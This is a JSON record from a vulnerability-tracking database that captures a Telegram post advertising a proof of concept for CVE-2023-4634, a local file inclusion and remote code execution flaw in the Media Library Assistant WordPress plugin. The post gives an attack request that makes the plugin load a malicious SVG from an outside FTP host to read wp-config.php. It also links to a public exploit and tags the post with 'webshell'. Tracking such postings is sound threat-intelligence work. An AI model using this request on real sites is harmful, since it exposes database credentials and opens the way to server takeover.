{"uuid": "9335b191-4be2-422c-8047-683f53ec42a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4634", "type": "published-proof-of-concept", "source": "https://t.me/leak_db2/1315", "content": "Media Library Assistant Wordpress Plugin - RCE and LFI \nCVE: CVE-2023-4634\n\nFor LFI, getting wp-config.php:\n\nBoth malicious.svg and malicious.svg[1] on the remote FTP:\n\n\nxmlns=\"http://www.w3.org/2000/svg\">\n\n\n\nThen trigger conversion with:\nhttp://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1\n\n\nUse exploit available here:\nhttps://github.com/Patrowl/CVE-2023-4634/\n\n@leak_db2\n\n#exploit #bug #deltaboys #db #database #wordpress #webshell", "creation_timestamp": "2023-12-02T20:03:56.000000Z"}